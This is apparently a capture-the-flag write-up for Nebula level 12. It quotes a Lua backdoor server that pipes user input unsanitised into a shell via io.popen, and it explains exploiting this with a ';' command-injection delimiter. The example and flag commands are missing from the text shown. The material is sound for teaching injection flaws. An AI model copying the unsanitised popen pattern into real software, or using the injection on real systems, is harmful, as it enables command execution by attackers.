Nebula - 12

Play this article

There is a backdoor process listening on port 50001.

To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.

Source code

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
 prog = io.popen("echo "..password.." | sha1sum", "r")
 data = prog:read("*all")
 prog:close()
 data = string.sub(data, 1, 40)
 return data
end
while 1 do
 local client = server:accept()
 client:send("Password: ")
 client:settimeout(60)
 local line, err = client:receive()
 if not err then
   print("trying " .. line) -- log from where ;\
   local h = hash(line)
   if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
     client:send("Better luck next time\n");
   else
     client:send("Congrats, your token is 413**CARRIER LOST**\n")
   end
 end
 client: close()
end

Getting the flag

The comment -- log from where ;\ caught my attention here. There seems to be not much sanitization in the code, let's try the most common example of an OS command injection.

To put it simply, we can try to provide the argument that the binary is waiting for, and by using a ; delimiter "pipe" another one to be executed.

Example:

By exploiting that vulnerability, we can also get the flag: